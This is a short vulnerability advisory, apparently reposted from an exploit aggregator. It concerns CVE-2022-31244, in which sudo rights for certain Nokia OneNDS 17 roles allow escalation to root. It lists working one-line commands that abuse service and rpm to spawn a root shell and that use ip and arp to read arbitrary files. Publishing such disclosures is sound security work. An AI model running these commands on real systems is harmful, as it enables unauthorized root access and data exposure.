Share
## https://sploitus.com/exploit?id=PACKETSTORM:171970
===============================================================================  
title: Incorrect Permission Assignment  
product: Nokia OneNDS 17  
vulnerability type: Security Misconfiguration  
severity: High  
CVSS Score: 7.8  
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H  
found on: 31/03/2022  
by: Giacomo Sighinolfi, Milena Mangiola,   
Savino Sisco, Valerio Casalino  
cve: CVE-2022-31244  
===============================================================================  
  
Some sudo permissions can be exploited by the users that have specific roles  
to escalate to root privileges and execute arbitrary commands on the system.  
  
The affected roles are:  
ONENDS_CC_BASIC_ADMIN:   
- it can run /sbin/service   
- can be exploited using `sudo /sbin/service ../../bin/sh`  
ONENDS_CC_SERVICE_ADMIN:   
- it can run /bin/rpm   
- can be exploited using `sudo /bin/rpm --eval '%{lua:os.execute("/bin/sh")}'`  
ONENDS_CC_NETWORK_MANAGEMENT:   
- it can run /sbin/ip,/sbin/arp   
- can be exploited using `sudo /sbin/ip -force -batch 'file_to_read'`  
- can be exploited using `sudo /sbin/arp -v -f 'file_to_read'`  
  
===============================================================================